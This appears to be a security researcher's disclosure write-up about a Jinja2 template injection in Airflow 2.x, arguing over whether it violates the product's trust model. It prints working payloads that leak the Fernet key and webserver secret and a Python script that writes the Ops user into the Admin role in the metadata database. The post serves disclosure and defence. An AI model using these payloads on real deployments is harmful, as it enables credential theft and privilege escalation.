TL;DR: I reported what started as a pretty clean Jinja2 SSTI in Airflow, and it turned into a much more interesting argument about trust boundaries, product intent, and what a security model is actually supposed to mean. The exploit chain was real. The disagreement was about whether that chain violated the model, or just exposed exactly how much trust the model already assumes.
This one stopped being "just an injection bug" almost immediately.
I started with a simple pattern. A DAG reads an Airflow Variable at parse time, drops the returned string into BashOperator.bash_command, and lets templating do the rest.
Code:
from airflow import DAG
from airflow.models import Variable
from airflow.operators.bash import BashOperator

# The Variable is read at parse time; its raw value becomes the template string.
deploy_cmd = Variable.get("deploy_command", default_var="echo hello")

with DAG("deploy_pipeline", ...) as dag:
    BashOperator(task_id="run", bash_command=deploy_cmd)
That looks boring. It is also exactly why it was interesting. The value returned by Variable.get() becomes the Jinja template string for a templated field, so if an Ops user can edit that Variable, they can feed Jinja straight into worker-side rendering. Airflow's best-practices docs already warn against top-level Variable.get(), but mainly from a performance and parsing perspective. They also show deferring Variable access through Jinja templates, which is fine operationally, but not the same thing as saying "this is safe if lower-privileged users control the value."

The exploit itself was not theoretical.
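The distinction between the two patterns is easy to demonstrate outside Airflow. A minimal sketch using Jinja2 directly (the `malicious` string is a hypothetical attacker-controlled Variable value, not something from the original report):

```python
from jinja2 import Template

# Hypothetical attacker-controlled Variable value (illustration only).
malicious = "echo SSTI_PROBE={{ 7 * 7 }}"

# The pattern from the DAG above: the Variable value IS the template string,
# so Jinja evaluates any expression embedded in it at render time.
as_template = Template(malicious).render()
print(as_template)  # echo SSTI_PROBE=49

# The deferred pattern: a fixed template treats the Variable value as data,
# so the embedded expression survives only as inert text.
fixed = Template("echo {{ deploy_command }}")
as_data = fixed.render(deploy_command=malicious)
print(as_data)  # echo echo SSTI_PROBE={{ 7 * 7 }}
```

The deferred form still has shell-injection concerns of its own, but it at least stops the value from being evaluated as a template.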
I was able to confirm template evaluation first with the usual dumb probe:
Code:
echo SSTI_PROBE={{ 7 * 7 }}
That rendered to 49 on the worker. After that, the useful part was not some flashy sandbox escape. I did not need one. The Jinja context already had what mattered. Normal access to conf, var, and conn was enough. So the next payload was just secret exfiltration:
Code:
echo SSTI_FERNET={{ conf.get('core', 'fernet_key') }}
&& echo SSTI_SECRET={{ conf.get('webserver', 'secret_key') }}
That gave me the Fernet key and the webserver secret. No __globals__ games. No cute sandbox bypasses. Just the runtime context doing exactly what it was designed to do, in the wrong trust boundary.

Then it got more serious.
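One reason it was serious: the Fernet key is what Airflow uses to encrypt Connection passwords and sensitive Variable values at rest in the metadata DB, so whoever holds it can decrypt that data offline. A minimal illustration with a freshly generated key (simulated; the cryptography package is an Airflow dependency, not something extra I installed):

```python
from cryptography.fernet import Fernet

# Simulated: in a real attack the key comes from conf.get('core', 'fernet_key').
fernet_key = Fernet.generate_key()
f = Fernet(fernet_key)

ciphertext = f.encrypt(b"s3cr3t-db-password")  # what sits encrypted in the DB
plaintext = f.decrypt(ciphertext)               # what the leaked key unlocks

print(plaintext.decode())  # s3cr3t-db-password
```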
Once I had the database connection string available at render time, I used the worker's own environment to connect back to the metadata database and write directly to the RBAC tables. The core of it looked like this:
Code:
export DB="{{ conf.get('database', 'sql_alchemy_conn')
| replace('postgresql+psycopg2://', 'postgresql://') }}"
&& python3 << 'PY'
import psycopg2, os

# Connect back to the metadata DB with the rendered connection string.
conn = psycopg2.connect(os.environ["DB"])
cur = conn.cursor()

# Look up the Admin role and the Ops user's ids...
cur.execute("SELECT id FROM ab_role WHERE name='Admin'")
admin_rid = cur.fetchone()[0]
cur.execute("SELECT id FROM ab_user WHERE username='opsuser'")
ops_uid = cur.fetchone()[0]

# ...then map the user onto Admin directly in the RBAC join table.
cur.execute("INSERT INTO ab_user_role (user_id, role_id) VALUES (%s, %s)",
            (ops_uid, admin_rid))
conn.commit()
PY
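For anyone who wants to trace the RBAC write without a live Postgres instance, here is a self-contained simulation using sqlite3. The table and column names mirror the Flask-AppBuilder schema Airflow uses (ab_role, ab_user, ab_user_role); the ids and usernames are illustrative:

```python
import sqlite3

# Minimal stand-in for the relevant slice of Airflow's metadata DB.
db = sqlite3.connect(":memory:")
cur = db.cursor()
cur.executescript("""
CREATE TABLE ab_role (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE ab_user (id INTEGER PRIMARY KEY, username TEXT);
CREATE TABLE ab_user_role (user_id INTEGER, role_id INTEGER);
INSERT INTO ab_role VALUES (1, 'Admin'), (2, 'Op');
INSERT INTO ab_user VALUES (10, 'opsuser');
INSERT INTO ab_user_role VALUES (10, 2);  -- opsuser starts with the Op role
""")

# The same two lookups and one insert the payload performed.
admin_rid = cur.execute("SELECT id FROM ab_role WHERE name='Admin'").fetchone()[0]
ops_uid = cur.execute("SELECT id FROM ab_user WHERE username='opsuser'").fetchone()[0]
cur.execute("INSERT INTO ab_user_role (user_id, role_id) VALUES (?, ?)",
            (ops_uid, admin_rid))
db.commit()

roles = cur.execute("""
    SELECT r.name FROM ab_user_role ur
    JOIN ab_role r ON r.id = ur.role_id
    WHERE ur.user_id = ?""", (ops_uid,)).fetchall()
print(roles)  # opsuser now holds both Op and Admin
```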
Before the attack, /api/v1/users and /api/v1/eventLogs returned 403 for the Ops user. After the attack and a fresh login, they returned 200. That is the point where this stopped being an abstract "bad DAG code" discussion for me. I had a concrete Op-to-Admin path, plus direct access to audit-log data and password hashes.

This is where the disclosure got interesting, because Apache did not really disagree on the mechanics.
The real disagreement was about the model.
Airflow's security docs do a lot of work here. In the 2.x security model, Operations users are described as effectively near-admin, with the docs saying that apart from managing and granting permissions to other users, you should otherwise assume they have the same access as an admin. In the current stable docs for Airflow 3, that language is even more explicit, and audit logs are called out as admin-only too. The same docs also note that Airflow 3 masks more sensitive information and changes how access to sensitive data works.
That was basically Apache's position back to me. The DAG author is trusted. A DAG that treats untrusted Variable content as executable template input is bad DAG code. If that code hands an Ops user a dangerous capability, that is a deployment mistake and a misuse of Airflow, not an Airflow vulnerability.
And honestly, that is not a stupid argument.
But I still think the line is messier than that.
Airflow's own architecture docs talk about distributed deployments where the Operations user can trigger Dags and tasks but cannot author Dags. That is a real role boundary, not just a philosophical one. The best-practices docs also present top-level Variable.get() as something users do often enough that it needs explicit guidance, but the emphasis there is performance, not "by the way, if a lower-privileged user controls this Variable and it lands in a template field, you may have just handed them worker-side execution and a path into the metadata plane."

That is the part I keep coming back to. Security models are not just lists of theoretical permissions. They are also contracts people build mental models around. If the docs tell people Ops cannot author Dags, and if the practical deployment pattern is "Ops tweaks Variables, DAG authors write code," then a chain that turns Variable write into worker-side capability escalation is worth treating like more than a docs footnote.
Airflow 3 is the strongest argument in Apache's favor, and weirdly also the strongest argument in mine.
The Airflow 3 upgrade docs are very blunt about the architectural change. In Airflow 2.x, all components talked directly to the metadata database, workers executed user code, and user code could perform malicious actions on that database. In Airflow 3.x, the API server becomes the sole access point for the metadata DB for tasks and workers, and direct metadata DB access from task code is restricted as a security improvement.
That matters because it explains why my chain worked so cleanly on 2.9.x. It also shows that Apache already saw this whole area as worth hardening. So yes, they are right that newer Airflow versions move the architecture in a better direction. But that also makes it hard to say the old behavior was purely theoretical or irrelevant. If you redesign the platform specifically to stop task code from talking straight to the metadata DB, you are acknowledging that this boundary matters.
There is also a precedent problem.
Airflow has already had a BashOperator injection issue treated as a real vulnerability. CVE-2022-24288 covered example DAGs that passed user-controlled params into BashOperator without proper sanitization, and GitHub tracks that as a high-severity command injection issue in versions before 2.2.4. My chain was not identical, but it lived in the same neighborhood: user-controlled data reaching an execution sink through templating and composition choices people absolutely make in real DAGs.

That does not automatically make every similar chain a CVE. But it does make the "this is just bad user code" answer feel a bit too convenient.
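The "proper sanitization" piece of that CVE is worth making concrete. When a user-controlled string is interpolated into a shell command, the difference between raw interpolation and shell quoting is the whole game. A small sketch with Python's stdlib (the `user_param` value is my own illustrative payload):

```python
import shlex

# Hypothetical user-controlled "param" in the spirit of CVE-2022-24288.
user_param = "x; id"

# Raw interpolation: the shell would see two commands, and `id` executes.
unsafe = f"echo {user_param}"

# Shell-quoted: the whole payload stays a single inert argument to echo.
safe = f"echo {shlex.quote(user_param)}"

print(unsafe)  # echo x; id
print(safe)    # echo 'x; id'
```

Quoting helps against shell injection, but note that it does nothing for the SSTI case above, where the string is evaluated by Jinja before the shell ever sees it.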
So, was it a vulnerability or not?
My answer is still "yes, but with context."
If you read Airflow 2.x as saying Ops is basically admin already, then Apache's response is internally consistent. In that framing, I did not break the model. I just demonstrated an unpleasant consequence of it.
If you read the model the way many operators will read it, which is "Ops can manage operations, DAG authors write code, and those are different trust levels," then this absolutely feels like a vulnerability. I was able to take Variable write, flow into a templated execution context, reach the metadata database, grant Admin, and cross the exact boundaries the docs describe as admin-only.
That is why this case was interesting. The exploit was the easy part. The hard part was deciding what promise Airflow was actually making.
And for the record, I do not think the maintainer response was unreasonable.
Direct, yes. Opinionated, definitely. But the core point was fair: security is not a binary sticker you slap on a product. A lot of it is risk allocation, trust assumptions, and being honest about what the platform does and does not try to protect you from. I do not agree with every conclusion there, but I do think that part is true.
My take now is pretty simple.
On Airflow 2.x, feeding
Variable.get() into a templated field like bash_command is more dangerous than it looks. Treat anyone who can edit those Variables as far more trusted than the UI role names might suggest. If you care about stronger separation between operations staff and execution power, Airflow 3 is not just a routine upgrade. It is a materially different security story.And that is probably the cleanest lesson from the whole incident. Sometimes the exploit proves a bug. Sometimes it proves the model is looser than people thought. Sometimes it proves both.